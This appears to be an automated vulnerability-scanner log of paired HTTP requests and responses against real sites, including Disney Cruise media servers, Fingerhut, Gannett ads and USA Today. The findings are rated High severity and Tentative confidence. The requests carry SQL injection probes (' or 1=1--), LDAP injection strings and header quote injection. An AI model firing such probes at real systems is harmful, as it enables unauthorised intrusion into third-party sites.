GET /media38734480'%20or%201%3d1-- Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:11 GMT Content-Length: 102641 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="DOLChrome"> <div id="gde_chromeData" class="gde_chromeData"> <div id="gde_chromeDataHome"> <a href="http://disney.go </div> <div id="gde_chromeDataRows"> <div id="gde_chromeDataTopRow" <ul> <li><a id="movies" href="http://disney.go <li><a id="tv" href="http://tv.disney.go <li><a id="music" href="http://disney.go <li><a id="live_events" href="http://disney.go <li><a id="books" href="http://disney.go <li><a id="parks" href="http://disneyparks <li><a id="store" href="http://www </ul> </div> <div id="gde_chromeDataBo <ul> <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go </ul> </div> </div> <div id="gde_chromeDataSearch" <a href="http://disney.go </div> </div> <script language="javascript" type="text/javascript"> var _gdeChrome = ne ...[SNIP]... |
GET /media38734480'%20or%201%3d2-- Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:11 GMT Content-Length: 33396 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="DOLChrome"> </div><div id="bodyContainer"> <div id="loginRegForm" class="yui-navset"> <ul class="yui-nav clearfix"> <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li> <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li> </ul> <div class="yui-content"> <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd> <dt><label for="loginPassword" <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput <dd class="loginFormSubmit"> <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd> <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd> </dl> </form> </div> <div id="forgotPassForm" class="flyoutForm"> <form method="post" action="/forgot-password/ <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd> <dt><label for="flyoutLastName">Last Name:</label></dt> <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd> <dt><label for="birthDay">Your Birthday:</label></dt> <dd class="required birthday"> <select name ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://dcl2.wdpromedia |
Path: | /concat/4.39.1.5/css |
GET /concat15929969'%20or%201%3d1-- Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:17 GMT Content-Length: 102597 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script src="http://dcl.wdpromedia.com/media <script src="http://dcl2 </head> <body> <script type="text/javascript"> //<![CDATA[ document.body.className = 'enhanced'; //]]> </script> <!-- <div class="busyIndicator"> <div class="busyVisual"> <div class="busySpinner"></div <div class="busyTextual hide"></div> </div> </div> --> <script type="text/javascript">if (!userType) { var userType = 'guest'; }</script> <div id="DOLChrome"> <div id="gde_chromeData" class="gde_chromeData"> <div id="gde_chromeDataHome"> <a href="http://disney.go </div> <div id="gde_chromeDataRows"> <div id="gde_chromeDataTopRow" <ul> <li><a id="movies" href="http://disney.go <li><a id="tv" href="http://tv.disney.go <li><a id="music" href="http://disney.go <li><a id="live_events" href="http://disney.go <li><a id="books" href="http://disney.go <li><a id="parks" href="http://disneyparks <li><a id="store" href="http://www </ul> </div> <div id="gde_chromeDataBo <ul> <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go ...[SNIP]... |
GET /concat15929969'%20or%201%3d2-- Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:17 GMT Content-Length: 33352 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script src="http://dcl2.wdpromedia.com <script src="http://dcl </head> <body> <script type="text/javascript"> //<![CDATA[ document.body.className = 'enhanced'; //]]> </script> <!-- <div class="busyIndicator"> <div class="busyVisual"> <div class="busySpinner"></div <div class="busyTextual hide"></div> </div> </div> --> <script type="text/javascript">if (!userType) { var userType = 'guest'; }</script> <div id="DOLChrome"> </div><div id="bodyContainer"> <div id="loginRegForm" class="yui-navset"> <ul class="yui-nav clearfix"> <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li> <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li> </ul> <div class="yui-content"> <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd> <dt><label for="loginPassword" <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput <dd class="loginFormSubmit"> <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /media20163560'%20or%201%3d1-- Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:15 GMT Content-Length: 102631 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script src="http://dcl.wdpromedia.com/media <script src="http://dcl2 </head> <body> <script type="text/javascript"> //<![CDATA[ document.body.className = 'enhanced'; //]]> </script> <!-- <div class="busyIndicator"> <div class="busyVisual"> <div class="busySpinner"></div <div class="busyTextual hide"></div> </div> </div> --> <script type="text/javascript">if (!userType) { var userType = 'guest'; }</script> <div id="DOLChrome"> <div id="gde_chromeData" class="gde_chromeData"> <div id="gde_chromeDataHome"> <a href="http://disney.go </div> <div id="gde_chromeDataRows"> <div id="gde_chromeDataTopRow" <ul> <li><a id="movies" href="http://disney.go <li><a id="tv" href="http://tv.disney.go <li><a id="music" href="http://disney.go <li><a id="live_events" href="http://disney.go <li><a id="books" href="http://disney.go <li><a id="parks" href="http://disneyparks <li><a id="store" href="http://www </ul> </div> <div id="gde_chromeDataBo <ul> <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go ...[SNIP]... |
GET /media20163560'%20or%201%3d2-- Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:15 GMT Content-Length: 33386 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script src="http://dcl2.wdpromedia.com <script src="http://dcl </head> <body> <script type="text/javascript"> //<![CDATA[ document.body.className = 'enhanced'; //]]> </script> <!-- <div class="busyIndicator"> <div class="busyVisual"> <div class="busySpinner"></div <div class="busyTextual hide"></div> </div> </div> --> <script type="text/javascript">if (!userType) { var userType = 'guest'; }</script> <div id="DOLChrome"> </div><div id="bodyContainer"> <div id="loginRegForm" class="yui-navset"> <ul class="yui-nav clearfix"> <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li> <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li> </ul> <div class="yui-content"> <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd> <dt><label for="loginPassword" <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput <dd class="loginFormSubmit"> <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /media'%20and%201%3d1--%20/dcl_v0400/Global/Promo Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:27 GMT Content-Length: 33405 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script src="http://dcl2.wdpromedia.com <script src="http://dcl </head> <body> <script type="text/javascript"> //<![CDATA[ document.body.className = 'enhanced'; //]]> </script> <!-- <div class="busyIndicator"> <div class="busyVisual"> <div class="busySpinner"></div <div class="busyTextual hide"></div> </div> </div> --> <script type="text/javascript">if (!userType) { var userType = 'guest'; }</script> <div id="DOLChrome"> </div><div id="bodyContainer"> <div id="loginRegForm" class="yui-navset"> <ul class="yui-nav clearfix"> <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li> <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li> </ul> <div class="yui-content"> <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd> <dt><label for="loginPassword" <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput <dd class="loginFormSubmit"> <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg ...[SNIP]... |
GET /media'%20and%201%3d2--%20/dcl_v0400/Global/Promo Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:27 GMT Content-Length: 102650 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <script src="http://dcl.wdpromedia.com/media <script src="http://dcl2 </head> <body> <script type="text/javascript"> //<![CDATA[ document.body.className = 'enhanced'; //]]> </script> <!-- <div class="busyIndicator"> <div class="busyVisual"> <div class="busySpinner"></div <div class="busyTextual hide"></div> </div> </div> --> <script type="text/javascript">if (!userType) { var userType = 'guest'; }</script> <div id="DOLChrome"> <div id="gde_chromeData" class="gde_chromeData"> <div id="gde_chromeDataHome"> <a href="http://disney.go </div> <div id="gde_chromeDataRows"> <div id="gde_chromeDataTopRow" <ul> <li><a id="movies" href="http://disney.go <li><a id="tv" href="http://tv.disney.go <li><a id="music" href="http://disney.go <li><a id="live_events" href="http://disney.go <li><a id="books" href="http://disney.go <li><a id="parks" href="http://disneyparks <li><a id="store" href="http://www </ul> </div> <div id="gde_chromeDataBo <ul> <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://fingerhut.tt |
Path: | /m2/fingerhut/mbox |
GET /m2/fingerhut/mbox Host: fingerhut.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 728 Date: Mon, 16 May 2011 01:34:28 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... t\/css\">\n#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink {\n\tdisplay:none;\n}\n<\ |
GET /m2/fingerhut/mbox Host: fingerhut.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 767 Date: Mon, 16 May 2011 01:34:29 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... #fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink, #credAmt, #fsCartDisplay .accountInfo {\n\tdisplay:none;\n}\n<\ |
Severity: | High |
Confidence: | Tentative |
Host: | http://gannett.gcion.com |
Path: | /addyn/3.0/5111.1/809051 |
GET /addyn/3.0/5111.1/809051 Host: gannett.gcion.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24' Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CfP=1; JEB2=4DD077236E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 19048 __ADTECH_CODE__ = ""; __theDocument = document; __theWindow = window; __bCodeFlushed = false; function __flushCode() { if (!__bCodeFlushed) { var span = parent.document ...[SNIP]... riteln = function(str) { document.write(str + "\n"); }; __theDocument = parent.document; __theWindow = parent; } document.write("\n"); function VBGetSwfVer_793739(i) { var sVersion_793739 = "on error resume next\r\n"+ "Dim swControl_, swVersion_\r\n"+ "swVersion_ = 0\r\n"+ "set swControl_ = CreateObject(\"Shock "if (IsObject(swControl_)) then\r\n"+ " ...[SNIP]... |
GET /addyn/3.0/5111.1/809051 Host: gannett.gcion.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24'' Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CfP=1; JEB2=4DD077236E651A4 |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache Content-Type: application/x-javascript Content-Length: 945 rubSect = ""; if (window.location.pathname else if (window.location.pathname else if (window.location.pathname ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://s7d5.scene7.com |
Path: | /is/image/bluestembrands |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT ETag: "943604b62d503a5fc59 Content-Type: image/jpeg Content-Length: 4123 Expires: Mon, 16 May 2011 11:36:53 GMT Date: Mon, 16 May 2011 01:36:53 GMT Connection: close ......JFIF.....H.H....... ..vW..\O.5....k.d..v.9N%. L.....u#r......%<..)LL..... . ......u...`.:....."e....k %X....F.......:.F......Q0..7W.%5%nt...Q........ ....4....eAAi.>.O..S..cz. ...[SNIP]... |
GET /is/image/bluestembrands Host: s7d5.scene7.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT ETag: "ad4e8c77ab76576a768 Content-Type: image/jpeg Content-Length: 4137 Expires: Mon, 16 May 2011 11:36:53 GMT Date: Mon, 16 May 2011 01:36:53 GMT Connection: close ......JFIF.....H.H....... .Y|.l..J..j.. .xqt.....ki..Q.q...S.u... 6.....<.~.s.7.n.....,._J .......,._1.........+u.' 6.a.>W..Iq>.UU..._x...-..........!@...S{}E....... i.c(......@...;.Q\...k... ,......z......es.Xa..a..X ....5..b...,.;g.. ..R..(I.. .K.+ ........{.j*...g.~.....\< aium8.....=A..k.Y:.....M. R..s.........v.}v].Q..qQ. ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://serv.adspeed.com |
Path: | /ad.php |
GET /ad.php?do=html&zid=3253 Host: serv.adspeed.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK P3P: policyref="http://serv Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Mon, 16 May 2011 01:21:36 GMT Server: AdSpeed/s3 Content-Length: 2104 <html><head><title>Mouse Fan Travel</title><script type="text/javascript" src="http://ajax </head><body leftmargin=0 topmargin=0 marginw ...[SNIP]... <img style="border:0px;" src="http://serv.adspeed ...[SNIP]... |
GET /ad.php?do=html&zid=3253 Host: serv.adspeed.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK P3P: policyref="http://serv Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Mon, 16 May 2011 01:21:36 GMT Server: AdSpeed/s3 Content-Length: 1705 <html><head><title <head> <meta name="GENERATOR" content="Micros ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 89530 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:30:06 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... <div id=\"pluck_user ...[SNIP]... |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anonId=81fbd51d-fba0-4197 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449728009; path=/ Cache-Control: private Content-Length: 89540 Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm4l3pluckcom Set-Cookie: SiteLifeHost=gnvm4l3 Date: Mon, 16 May 2011 01:30:07 GMT Connection: close plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... <div id=\"pluck_user ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://dcl.wdpromedia.com |
Path: | /reservations/concat/2.39 |
GET /*)(sn=*/concat/2.39.0.9/css Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:35:36 GMT Content-Length: 102652 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="DOLChrome"> <div id="gde_chromeData" class="gde_chromeData"> <div id="gde_chromeDataHome"> <a href="http://disney.go </div> <div id="gde_chromeDataRows"> <div id="gde_chromeDataTopRow" <ul> <li><a id="movies" href="http://disney.go <li><a id="tv" href="http://tv.disney.go <li><a id="music" href="http://disney.go <li><a id="live_events" href="http://disney.go <li><a id="books" href="http://disney.go <li><a id="parks" href="http://disneyparks <li><a id="store" href="http://www </ul> </div> <div id="gde_chromeDataBo <ul> <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go </ul> </div> </div> <div id="gde_chromeDataSearch" <a href="http://disney.go </div> </div> <script language="javascript" type="text/javascript"> var _gdeChrome = ne ...[SNIP]... |
GET /*)!(sn=*/concat/2.39.0.9/css Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:35:36 GMT Content-Length: 33408 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="DOLChrome"> </div><div id="bodyContainer"> <div id="loginRegForm" class="yui-navset"> <ul class="yui-nav clearfix"> <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li> <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li> </ul> <div class="yui-content"> <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd> <dt><label for="loginPassword" <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput <dd class="loginFormSubmit"> <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd> <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd> </dl> </form> </div> <div id="forgotPassForm" class="flyoutForm"> <form method="post" action="/forgot-password/ <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd> <dt><label for="flyoutLastName">Last Name:</label></dt> <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd> <dt><label for="birthDay">Your Birthday:</label></dt> <dd class="required birthday"> <select name ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Site |
GET /*)(sn=*/dcl_v0400/Site Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
